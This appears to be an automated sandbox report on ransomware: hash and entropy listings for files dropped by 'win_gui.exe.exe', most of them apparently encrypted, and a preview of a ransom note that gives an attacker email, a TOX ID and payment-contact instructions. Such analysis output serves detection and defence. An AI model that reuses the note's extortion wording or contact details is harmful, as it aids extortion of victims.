                                MD5:B744F71EAD1CC6FF885A773C5E412A09
                                SHA1:097E80FDE8942637DEC1187A3E8DEF1E79012809
                                SHA-256:87F67136E07D417FB348320053F2447C300E01C25E243A5A3DBFE634A16A7360
                                SHA-512:983D6D38DCED5C6445CFA4451726870EED5346FC7E4B17EFBC6647443311F457677AA83206E866986FB0E731A29771C6914F87B29D17054743017188C8D59868
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.932219646503449
                                Encrypted:false
                                SSDEEP:48:xUdcIsJCK6RYlJ6FHcn4pgr8kN6JNVx1596Scxtv9gX/vX1nzhLpxd1sAjPs/WyP:xLzoSc9kmgrzN6JNVx0XtW1FnsiUevur
                                MD5:3584C6462E07FD835EA897E3B4A14698
                                SHA1:F28066197DCD2CEE7D67658CB2C2A6C1858BE4D2
                                SHA-256:713B78C7682BC333DE582BEE82E7AA5D4D8F6B677399AD6B0F10D9F9E443FC3C
                                SHA-512:B41F03A523BCED66C4F96376A60DD0F638447E4EA83C96DFFD64301EC49DB43BC861775F9878A6D56E7A34C48139B7A03CB00B7A8899AE5A91660DEFCB535BFC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.86960514371218
                                Encrypted:false
                                SSDEEP:48:D/OSJXq1udgb4NqBoUb0F1OU1/Z/WyYu+MAVMJg6TT2+:1JOuab4NeoUbmOUlZevuAVOTH
                                MD5:205F57F42A4231AF0123C929A27209BE
                                SHA1:E29372C6E0211E7FE78A019F4F17FD7AC54E7868
                                SHA-256:78C5C58025B5524C09A66EF53F48D5DB80E919F6940AEFD3E9C0F2002B7B13C9
                                SHA-512:18CC2D4A889DCC7DBFDEFF3A25F12420B8CBDEBDCB4239F883DD17F61DB6BB3370DB3B828A6723588D2DDAA4E8705E6312EB032AF98E5420E4699D603110CAA1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874637311883123
                                Encrypted:false
                                SSDEEP:48:aiP/Wb7fUyFYKD0k3K4hOz6xzmkn/WyYu+MAVMJg6T34W:As7RYKeZnevuAVOt
                                MD5:A294BE7969D9BD7F04DF50B72DF91F3A
                                SHA1:CB3439CEAAFC9BF8F7B0A34DB15EA822A1B45DCA
                                SHA-256:85AF450DD6B17B74945FC57942D71C59E63A12610A0CDB91B9821B3339C422F3
                                SHA-512:854A02892806155BC3C2475B0B697B7A81C948B6F35076CAE5243FE36B580446212737649C3BBF594D86BA94C41275AE761D6124EFA2E5A2C05EA307FE922354
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855060284912172
                                Encrypted:false
                                SSDEEP:48:EmUEaSALJptGLrk7t/WyYu+MAVMJg6Tthq4:EmUEYbtTevuAVO/q4
                                MD5:FC18F0A5A90C0FD1321F084B2664A607
                                SHA1:FE2C60783DFEE4EC0CD3FE83557F1E0794836C48
                                SHA-256:617B29CC33D3907E3F1909B0245B9783427B0E8F4D515EEAE0FB95735CF37F33
                                SHA-512:29E55D07786A99C7F0B5C17F951C13E1F539F5BDFF505B8E702181375F8D1C6F02AFC9B2C8F6CD5A9DB16E6D95190B2E65B668A1B653F9E7C77D4993B5FAC84D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855060284912172
                                Encrypted:false
                                SSDEEP:48:EmUEaSALJptGLrk7t/WyYu+MAVMJg6Tthq4:EmUEYbtTevuAVO/q4
                                MD5:FC18F0A5A90C0FD1321F084B2664A607
                                SHA1:FE2C60783DFEE4EC0CD3FE83557F1E0794836C48
                                SHA-256:617B29CC33D3907E3F1909B0245B9783427B0E8F4D515EEAE0FB95735CF37F33
                                SHA-512:29E55D07786A99C7F0B5C17F951C13E1F539F5BDFF505B8E702181375F8D1C6F02AFC9B2C8F6CD5A9DB16E6D95190B2E65B668A1B653F9E7C77D4993B5FAC84D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8584829539120715
                                Encrypted:false
                                SSDEEP:48:IpPNtOMd5NljPRbCXnXYwD93c/WyYu+MAVMJg6TFc7:IZKeVwXNdcevuAVOFm
                                MD5:649049B2E631202C1EAF79B8D39F627E
                                SHA1:2B4326DB75538BD2C2E3B1E013CE126B1D1E91AC
                                SHA-256:3A25C46C47F4F6EE7AD1B18C3812C8DFF58ABB01B9A74938AE14BAF426D4DAF4
                                SHA-512:F9B72B6174E9EC445EB58578F9B1FD259AB333EC18FA7559267EEB8B60A9524DDB80F3FBE62D06E04C4D73B49E82709934BA11461FC4B8A43DA33117C3A92D80
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8584829539120715
                                Encrypted:false
                                SSDEEP:48:IpPNtOMd5NljPRbCXnXYwD93c/WyYu+MAVMJg6TFc7:IZKeVwXNdcevuAVOFm
                                MD5:649049B2E631202C1EAF79B8D39F627E
                                SHA1:2B4326DB75538BD2C2E3B1E013CE126B1D1E91AC
                                SHA-256:3A25C46C47F4F6EE7AD1B18C3812C8DFF58ABB01B9A74938AE14BAF426D4DAF4
                                SHA-512:F9B72B6174E9EC445EB58578F9B1FD259AB333EC18FA7559267EEB8B60A9524DDB80F3FBE62D06E04C4D73B49E82709934BA11461FC4B8A43DA33117C3A92D80
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855484310276105
                                Encrypted:false
                                SSDEEP:48:glkNz/OuyFO0947mQ/WyYu+MAVMJg6Th+:gwzORF7mZevuAVOs
                                MD5:B8A6EFA3392FE3C57674A1A79B99D725
                                SHA1:305426A6C86E7D68273D6CCBDB93C7AB01217F01
                                SHA-256:7114042BFD89420422C54E4A6A9F8B0E0806B38C5C749AB8CB6332B39FDF2A0D
                                SHA-512:0A3FBAD95ABE4391D1689B1E7AB410844C2C23965F66BB0925CF8884C0143AA6070C10431E678266C55FC7AF5B97472F8EF49481898B8145BBE624AD1EC32B9E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871559806560873
                                Encrypted:false
                                SSDEEP:48:y9qGSiWCCHW+IPUS8Pv/WyYu+MAVMJg6TA+:y8ti5C2+IMSqvevuAVOA+
                                MD5:D13A13BBB7A7E1CAF238B76E063DE84F
                                SHA1:83E2F1958E3D61AF700819952822C7CE54DCA5AF
                                SHA-256:429D1D61F6B49310ABCBC7E09C972AF332D9EAED89374349DAEFD5E114E8F468
                                SHA-512:D75ED113B01B1DB4C03077EE5E94085597A8A47610D541DAB64AAFBE8FB486F72075F584CEB236548AA36448D0CD3024BDCCFB08B69A58118A8841A79EA6200D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871559806560873
                                Encrypted:false
                                SSDEEP:48:y9qGSiWCCHW+IPUS8Pv/WyYu+MAVMJg6TA+:y8ti5C2+IMSqvevuAVOA+
                                MD5:D13A13BBB7A7E1CAF238B76E063DE84F
                                SHA1:83E2F1958E3D61AF700819952822C7CE54DCA5AF
                                SHA-256:429D1D61F6B49310ABCBC7E09C972AF332D9EAED89374349DAEFD5E114E8F468
                                SHA-512:D75ED113B01B1DB4C03077EE5E94085597A8A47610D541DAB64AAFBE8FB486F72075F584CEB236548AA36448D0CD3024BDCCFB08B69A58118A8841A79EA6200D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.861651192882324
                                Encrypted:false
                                SSDEEP:48:r0UCJNEMHzqjPYecd6hVi8l8z+HE/WyYu+MAVMJg6TR:kXHzqjQvd6nscEevuAVOR
                                MD5:3B13D5185DCE68D970F49BBC3DF1FC11
                                SHA1:1DBC8D21B63AD1B6906B44F9C45ACD97E95A5CF8
                                SHA-256:47CFE4FE9633D4D891CF882524C2C59E197EB217082C1985606622FCAE3FB266
                                SHA-512:857A21A8F7721A7D583A51CF52B9681C9C5D22EE236E474C4E25732912C13B3068CE3422AA5CE07C9C64A8C220E88FBAAB10CA00757DD71AD27B612BA0A36067
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.879902592427107
                                Encrypted:false
                                SSDEEP:48:4HzC8umzvyUbECRhL79A/WyYu+MAVMJg6Tcr+:s1zKUbEg7ievuAVOU+
                                MD5:A767EA34DBFD9C02D6FA899093D3C984
                                SHA1:EA1BBAF4CC7E2AB1400CDB8B879E1198ACC03DE9
                                SHA-256:E5758F56653795E789B06A4D80EAAD8343F511BEAC310FA62B9B439995195AA1
                                SHA-512:A0F77B0F269B56B0D5C405485BAC4CFF8F0A6627FA0F063C7DAAE07FCA350D2C6F62687A11555C7AB7B8C095D80C14A39C58A86ADD08FA9715B96FC1A0ED543C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874423051863231
                                Encrypted:false
                                SSDEEP:48:pKjfB3neBH841yWxkAZbn/WyYu+MAVMJg6T4:cfBXsc+lZDevuAVO4
                                MD5:3CB41EDC129EE610ADAC5BA869C023FD
                                SHA1:DDA1B96D18E8D14BB20DF829120FAF0DB0ECF5E1
                                SHA-256:F8FF5466386A40593E42E6DE48742854CF118594E5BA561CF64DCFAC2D86DE9C
                                SHA-512:B4891DEBAF7BC0128675A3A6CB6F35D3E5DE11A7CAF013996C08C6C9CFEE57AD52F86B991F4FB3037500A4F6C4BFBA942E017794DD10101A81A432B797367601
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.854324211595779
                                Encrypted:false
                                SSDEEP:48:hQMoP4ul9Go8Xzei5Bg6nv/WyYu+MAVMJg6T2:hQ489UDnng6nvevuAVO2
                                MD5:2E582CA010BDD1B49FB74FCD3FBF8AAD
                                SHA1:45721303D6058CC13E52F4B2383B29CDFAF3ABAB
                                SHA-256:7B826E73BBCA9CFDDA97648C563B04D7EEF2848239A8265DCF33331E008DE0E9
                                SHA-512:7466E04DB1AF823336AF37BDD71B035B38EB6C78AAA917AEA5F7BB90F4738B8490E33AA693EC9EA604236C3ADFBB9881378EF82EE4D1F3B55DB6FF08F6526B62
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.875741186330271
                                Encrypted:false
                                SSDEEP:48:pRvaZma7A4YUMYlhuK/WyYu+MAVMJg6Tsa:zer7A4Y6CKevuAVOsa
                                MD5:A33F6E9450A2C58E1ECB12CA7E8F760F
                                SHA1:4D269E09B94881817753D266CCA9D315A526CF70
                                SHA-256:3F60798A66A280043609E6593589DD06290F81F1DC74D689E277F916ABC29AFC
                                SHA-512:5A85A4ACD02BD888F37B3A1BFF74778C660C99E03E0E8FCEF0B5DC93259F7ED5C836BB3D771C88AAB06DECCCF883746DD5476EFAE5515BEF098BAFC72D3822C3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.873293781737056
                                Encrypted:false
                                SSDEEP:48:kZiCblxPa0Je469+lEQbxq/WyYu+MAVMJg6Tuv:QZxOTe8evuAVOu
                                MD5:0825944828C20B8691A09B1EF4B667C7
                                SHA1:C77EBF9913D7853199403C532FE6BB9959905E5C
                                SHA-256:6C3B204A3A7AA35DFDA36F513A78813AA1D74C223409E8B6CBA37EA336E62B5D
                                SHA-512:D9347885CA43293142F2327282811012CCCAFC42267554EFE44693A8EC7E6EDEF89330C5E1A74ED18DB439B1E7B39D77AC0199E5284F7C5FA06A42B507DEC937
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867380751966938
                                Encrypted:false
                                SSDEEP:48:SGW3Sd5D6YQN9kwkW9BcpKe7A9C/WyYu+MAVMJg6Tiw:SGW3cl6YK9kwkW92b8EevuAVOn
                                MD5:66B99FB454B1631516A0BD2947C94C18
                                SHA1:06B51BAB918C3E7902B425848B807EFB2FA1044D
                                SHA-256:D620D4C115458D37B4AC100DCA22C3C808698A3576CC098616F09DBDFAC5CCED
                                SHA-512:8A011FCCE462A1B1521ABD179A8629DC22EF6BA1D2891F43626A456B45B9A70F47DEA1870131B67085BA007F89842F78364949C86A11CB80FE1DABA2F42D5A3B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.872245743467843
                                Encrypted:false
                                SSDEEP:48:9qaXzvCJol+KBWjVEgi/WyYu+MAVMJg6TF:9/XblbWJEBevuAVOF
                                MD5:0D49BBDCE0CE90BF82F9112D03BAD1B3
                                SHA1:9809B268AC9B67B1A7F685212947F08E18B51BE0
                                SHA-256:BDD73A8A1A47D3DAED1AA419D6836FE90CDEB09BDC6CFA3265B87199709E5302
                                SHA-512:477CF9F07D9BD8621572CB8AAD4284413174429D67FBC7D239347AA2B8BD4D73ACCC588BB8C035700F64C1909605BCE2AC98447C5456CAAC6F7736DD7C7E5B31
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885051206584612
                                Encrypted:false
                                SSDEEP:24:kdmn9S9FQr6ykqT9SembJRBQpzifTqLz/wpDyYPGTNj0hOHAVMJg6WXs9XZ:VOQryR8zif23/WyYu+MAVMJg6Tz
                                MD5:729941D05D533829D513D26C8D800471
                                SHA1:80A1FF3B5A7617A0ED23E85DAB8B3FE07DFD7C68
                                SHA-256:4BB667C67DA4C5DB02506633A0FA3AA88ADC198E9F8BFA688B5562055988C3B3
                                SHA-512:AE5532695078678BA062698995E4ADF0EBC5B109F7044348349B8934ABB1A8EEFE27C829C91CA5B3658BB49380D59ECABA29633790F54A0D1D985A35A0B8FDBB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8848491916223855
                                Encrypted:false
                                SSDEEP:48:lQTAPGhsVKCok5tPz8f1l1Jaqn2XyL/WyYu+MAVMJg6TeD:Z+ddyqJa3XyLevuAVO2
                                MD5:304C501D15834F77038ED86A8DC2EBB5
                                SHA1:B03A155717ECA9DD8ACCC3ED46B97F9A2E48BED8
                                SHA-256:DA604A8932F65663D3F7B9350FDE5F8A870EFC291C67C5DA7C01D60CD58AD017
                                SHA-512:2EC568F2C2E8AF8596351165DF8A7390B97081426E400473C81A56B4D1EA359890D4F7BA5340E0FC7A0A4E9276A42560A7FD8FA835656A662508697A17A54EE0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.868133533340762
                                Encrypted:false
                                SSDEEP:48:sUlrvgbN/wN5f2TFOBbU/WyYu+MAVMJg6TSp:T9oif2TFOBbUevuAVOY
                                MD5:11EE959BB409C1726B596C9D142CE633
                                SHA1:495D567F1BFE7D17BA38DB4679B3C53CE7A39B31
                                SHA-256:6B40D44A33212A8737B41A1F2AFB96C92A3118377A2D17C590E94E4A0571E080
                                SHA-512:38E3F64D28F6B314479F017796BDF1A9F65510D989AF72A782AA3B5C18CA91BC88E3F33A4F735BA6C971EF1675071727AB709F3F6CDEA0051AE6E03667CF044C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.880126065721922
                                Encrypted:false
                                SSDEEP:24:oWZtcJI1V4wCzlKilqLFsLxzylxCgOlwEQxz/wpDyYPGTNj0hOHAVMJg6WXs90k:oWTX4dlzLxzOOnK/WyYu+MAVMJg6T+k
                                MD5:D92C30EF42450740D7DEDEE736BCC69B
                                SHA1:95DFD199C46464A00B59CB4EEE6688597BCA269C
                                SHA-256:AFAD661D6B9C7AADE2E46B601527A2ED1A5FC16CD57200B62760854C4723F46E
                                SHA-512:E97F0D8D55997D4CFBC4FABA8467209C7DC90B1B4615DED48B61375DB587E44CA7C31CE15D654B479C7F877BC6C6E812B4EFE59EDB475D36152230D6E5BBF4AA
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.864025982549886
                                Encrypted:false
                                SSDEEP:48:d38+aaT9Ba5jm1omS4GXhP/WyYu+MAVMJg6Tgc:tZaA9M4SPevuAVO7
                                MD5:5467BB9E8B709CC1F6C24C41FCB2464B
                                SHA1:8192B8DDC5E688CC4F59F1C0793D1AC2EE56E4E6
                                SHA-256:C5D73E43E19F871CCA63CB96B9BDFC3EF11662EEAD0794A475FFD92470FF6D63
                                SHA-512:D15385749B049888733DA4629D61A1F7DBAD097F8BAEEABA92106E3698D6610FA0AF706856DA3F32A07FCF1F08EE5149EBA03912DD5444C7AF2874AB6E22BD6A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885076544907748
                                Encrypted:false
                                SSDEEP:48:pz0wVpVbQkSj9egWVNXRkj/WyYu+MAVMJg6Tl:pAwV0kY9X3evuAVOl
                                MD5:28F90DADB30533701168912032FC2335
                                SHA1:DADC79957EECC62B77A882671FD7023094821FBC
                                SHA-256:CA8B43ED9EBC9E2B9025A0F587E99D90619AC24D134109793B1C7401337F3C8A
                                SHA-512:7432D0EC55F4054DF75DF9A7FE48399BCF43FBC566DAF85E0ABFCC1E52D64EC737EDF03F420CD25D0E99B285C8A2584A4A711F1E52611B681876C1EA38818ECC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.861195862831501
                                Encrypted:false
                                SSDEEP:48:nF8mkvWTu1hdbD4AC7Vhq7qEYzjmb7/WyYu+MAVMJg6T2w:ervTv/AbqGrWb7evuAVO2w
                                MD5:C61BA0EFD4FAB252ECF1F28691B4F0D5
                                SHA1:EDC04D5932311A487E469FB000BDC91D0543C9DC
                                SHA-256:F2DC01A3CC1AD2D959DA50DB0FC909122CFD6B6FD3BB90542823EFCB8F796A23
                                SHA-512:BE1AFCA7167BC742A7A05DF062726ED3F678746156BBF6E7D82752B3496B882657B361D71A5F5B2BF69B34ED84EE2C4C0ED740D916EC999A69A6FE0E82703619
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885035934167579
                                Encrypted:false
                                SSDEEP:48:XpY4Z4ABfkL8o6dN1y1NkEAJi/WyYu+MAVMJg6Tza:XpYi4LLu16NevuAVOza
                                MD5:CFDA2D392C7FD5BC3A24A7010E0E840D
                                SHA1:4C5017FE67A9A6FFE600CD28C2A9D617CB61A015
                                SHA-256:0784D5359E05DCEBB04B3FBE37CF0F8CE49E8E022D58C62A63A9DE309C833502
                                SHA-512:5CEF6A85E6442C60E88E047FD977F69A7319DA4AF9D2002055CA3BC4C2B8C8A34EA79E47AACA2848CAC79C769D9DD33F468C9317EC2DA81B56AA1375789AF862
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.873682634584006
                                Encrypted:false
                                SSDEEP:48:4anBglLiSzpam+sg2z/WyYu+MAVMJg6Td:4dvaN2zevuAVOd
                                MD5:064CF08209BB8F4E592D3E14BF0015E4
                                SHA1:B623AC5EF28D62108E0717D186BFEBD3FA27F867
                                SHA-256:C906E67AFC49EBA42459F25EC8BF108476A4FF4530BD8935A5B49AA16E62BD63
                                SHA-512:A8CD900C21A7688B08B4D0EE7863AB8059D4A8C5516873F6F70E83BFA4AEBEDEE34E391349A57A0840EAF091FC1125D2205A1C5C4B686274F6515B14CC7149C6
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867527238023455
                                Encrypted:false
                                SSDEEP:48:C7zQCU4Xv5l1eYLHg3J4/WyYu+MAVMJg6Tj:C3QR81eEHgqevuAVOj
                                MD5:88CFCAC1FE80E2442B250633DAC9B650
                                SHA1:2B76C55D8DCA9C563A287D88B76973F935ADBDCC
                                SHA-256:2D051E3D5542F6CCC74AD20763EEDF3C47EC35EB65BED88F6A8F3485C6203A3B
                                SHA-512:A05F168853800F1FAA60DFC32E611D29E5CB5E1349D745D3D685D0B76DCD2D6CFE997DCED27D44AC11C0B630FC3DBC75FE2B6DFDC145118498DFC87F985DACDD
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.886944878320974
                                Encrypted:false
                                SSDEEP:48:rae46XLZIi16tnZZJCnegB7nEi0/WyYu+MAVMJg6T+ucl:+eXLZzIZX6eUMevuAVO+H
                                MD5:BFD580AB21C3B6CE2C07672301F2DC8E
                                SHA1:1F106C84BEBA2526440B0862D30FA657F4FF2C13
                                SHA-256:7A21B1757EB664EDC1D52673FD21B8CA0609F52EB196261EF8EFBAD37280D0CA
                                SHA-512:A945EB888859681537F6B6161E57E7163D8F583445DB63CC5A3DBD519650C5190F16160F3CC44EC3C1FF7D3B4B5D1056346374DF08A6689EFF084E19624121E0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878821345888607
                                Encrypted:false
                                SSDEEP:48:bDH7XckKBAX9+Nb6uuIRDy7/WyYu+MAVMJg6Tjk:f4PA665IRDuevuAVOY
                                MD5:2B0D8A1DF2DA7DE47394BD5C802CD20A
                                SHA1:8A844DF3C2729B90A43505C6208FD205DDA2E2A1
                                SHA-256:35AE902D8A3FA40726324C5AAD4239BC801FBC8E9B331323E9980B8E2CE717D5
                                SHA-512:D3E7183326D10075E34A16918B78525B09FE990E0FEF47834BBDEDE86DDD4E82061652DC41E449B02C19CA43052D96EC133CD6801FE8D49199CFD8C2C3BA7924
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.879165403010126
                                Encrypted:false
                                SSDEEP:48:z/twGAwC3ag1weVb01+zYjWeFu2OV/WyYu+MAVMJg6Thc:zV8GgnQXWeFu2OVevuAVOhc
                                MD5:875C4D6319995B46F29FE73D1DE7DE17
                                SHA1:038CCF81303A2543A83C41B1FBA25BE7F57A96B9
                                SHA-256:8D8E9C7E85FF62C6CF3B1EAD92E8924DA9005480DE1EF9B475F7C74504CCC671
                                SHA-512:B9475F7B12E55CB51E81CB613E50A33BDF1112027C947D4FB644581AF2F80AAD3AA16E9DA8A4654A8DC1BC76580F1128B9ADC3CB786CC7E75664440AC637090A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.868520355289455
                                Encrypted:false
                                SSDEEP:48:x8h+ENcDUXEy5UzNg2YSpmd/WyYu+MAVMJg6THY:xIcDmEy5INk9devuAVOHY
                                MD5:C84BE515265BBB74E328546D3D112C38
                                SHA1:CD86122BE21E772AE4E6BCC7662A7C344E4A772A
                                SHA-256:18DE4C77F880CB2B1E87E2A124A46F38ECA8A461DF34EDDE256808A52A078857
                                SHA-512:E342596BCB1FBEF32167CE4897B15248CAF1D57230B90872E26E1C3F032E9C12D5ECC83747F6ACC7DC3BE6F314A5930B169AA463ACA807C0676CA3AA8E5EF653
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.857450306867071
                                Encrypted:false
                                SSDEEP:48:uTb3c/l0Q7hrSaecQi1HsEvnkO/WyYu+MAVMJg6TsC:uXc/l0WZSazQMHsE//evuAVOsC
                                MD5:DA9AC762F5306CB6E7D16E7DA6B925F3
                                SHA1:76B902E4CF7C82B6D70426BC5F7071ED4514BAA6
                                SHA-256:3EBEED41BDAFC537190682D84FEF185DEA51D46B2952059B77B648755E0E88FC
                                SHA-512:8BE14BC00E8F0BC7753D35C681458CA827216241CA5DE748FF7BB50248D67DB6F10ABB671E57CD3F7CD9AB86BBA5C3EFC0F711FB8F304CF9220041B2610841B3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874479204520987
                                Encrypted:false
                                SSDEEP:48:oqDn37JyBNcYQyJjAvkh/WyYu+MAVMJg6Th:oqzLwBBAvEevuAVOh
                                MD5:127F1C88F94C7A0D1CD9F14B9F411719
                                SHA1:0C402C28A1E223905C8F1CF76F7E3E24CD5B8526
                                SHA-256:EC50AC5A71F058D4737F3D6CC63405CAADB40A705CCD626D0B453DACCA0380EF
                                SHA-512:8BCF45C007E470CA1DF705D3034D8051B6610A88144A1805FC30A5AFCCA81EA2AB0441FF838CE8788BF467AD90633AA835694066EAAB969DD486C805D0B43CFD
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871101786799894
                                Encrypted:false
                                SSDEEP:48:c9go3TFaaDb/BPJnCCbIySqoDVz/WyYu+MAVMJg6TS3:c9txaaDb/BBnCCbIBqohevuAVOS3
                                MD5:D7B17E7CD6622D9665203EC1F8F024BD
                                SHA1:6E5BE482CFAA879215441126088AE3C088A621E8
                                SHA-256:4DFD3E69B21339A7930385CD3896CCD448EEB0BFD9981247B0EAFEAFCA1BA0AE
                                SHA-512:672BF9CE9CD4D94A14F2CA9AE91ABA95B7F3D6EF6F1BBDB4BF6E69B864CB0EEA524A200EA2C48307398FFB3B54B10DCBC173C82F86513EA596E8B605F32BB60D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
